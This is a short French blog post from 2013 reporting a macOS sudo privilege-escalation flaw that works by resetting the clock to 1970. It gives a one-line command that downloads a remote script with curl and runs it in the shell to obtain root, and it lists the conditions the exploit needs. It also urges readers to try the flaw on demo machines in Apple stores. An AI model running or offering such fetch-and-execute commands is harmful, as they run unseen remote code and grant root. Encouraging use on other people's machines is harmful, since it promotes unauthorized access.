J'ai été alerté par @pyrou d'une faille liée à la commande sudo sur le système d'expoitation Mac OS, pour ça il suffit d'exploiter une faille vous téléportant en 1970 
Après Linux c'est au tour de Mac OS de permettre à un utilisateur de s'approprier les droits root (super utilisateur).
Pour y parvenir il suffit de taper cette commande dans un terminal :
source <(curl http://kwix.fr/sudo.sh)
Deux conditions à l'exploit, il faut :
- être admin sur la machine (ce qui est différent de root), c'est à dire avoir le droit de changer l'heure et avoir le droit d'executer la commande sudo
- que le réglage de l'horloge ne soit pas verrouillé (chaque groupe de réglage pouvant être verrouillé sur macos, un mot de passe est demandé pour pour modifier les paramètres)
Reste à attendre un correctif par Apple, l'info de cette faille étant confirmée aussi chez MacG. En attendant vous pouvez toujours faire un tour chez les revendeurs Apple, comme l''AppleStore, et utiliser cette faille
note : url mirroir du script de @pyrou
Vous devriez me suivre sur Twitter : @xharkArticle original écrit par Mr Xhark publié sur Blogmotion le 30/08/2013 |
Aucun commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons